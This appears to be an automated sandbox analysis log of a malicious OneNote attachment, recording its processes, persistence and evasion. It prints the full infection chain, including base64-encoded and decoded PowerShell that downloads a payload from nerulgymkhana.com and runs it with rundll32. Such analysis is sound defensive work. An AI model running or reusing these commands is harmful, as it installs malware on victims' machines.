Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://webshell.suite.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://wus2.contentsync.
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://wus2.pagecontentsync.
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://www.odwebp.svc.ms
Source: unknown DNS traffic detected: queries for: nerulgymkhana.com
Source: global traffic HTTP traffic detected: GET /CCoN/01.gif HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: nerulgymkhana.comConnection: Keep-Alive

System Summary

barindex
Source: Process Memory Space: powershell.exe PID: 2104, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2104, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\putty.jpg,Wind
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Original.one
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Open.cmd" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL25lcnVsZ3lta2hhbmEuY29tL0NDb04vMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg=='))
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmd
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -URI https://nerulgymkhana.com/CCoN/01.gif -OutFile C:\programdata\putty.jpg
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\putty.jpg,Wind
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Process created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE /tsr
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Process created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE /tsr Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL25lcnVsZ3lta2hhbmEuY29tL0NDb04vMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg==')) Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmd Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -URI https://nerulgymkhana.com/CCoN/01.gif -OutFile C:\programdata\putty.jpg Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\putty.jpg,Wind Jump to behavior
Source: Send to OneNote.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6124:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE Mutant created: \Sessions\1\BaseNamedObjects\OneNoteM:AppShared
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5296:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE File created: C:\Users\user\Documents\{9BFEE3CF-0266-4079-BAB7-95B53E3DF5E2} Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE File created: C:\Users\user\AppData\Local\Temp\{5CEEC737-82ED-44D3-8D7A-3C6E23D0875D} - OProcSessId.dat Jump to behavior
Source: classification engine Classification label: mal64.expl.evad.winONE@14/326@1/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE File read: C:\Program Files (x86)\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior

Data Obfuscation

barindex
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL25lcnVsZ3lta2hhbmEuY29tL0NDb04vMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg=='))
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL25lcnVsZ3lta2hhbmEuY29tL0NDb04vMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg==')) Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3232 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7274 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1504 Thread sleep count: 3232 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1324 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4648 Thread sleep count: 7274 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4872 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4768 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3228 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1964 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
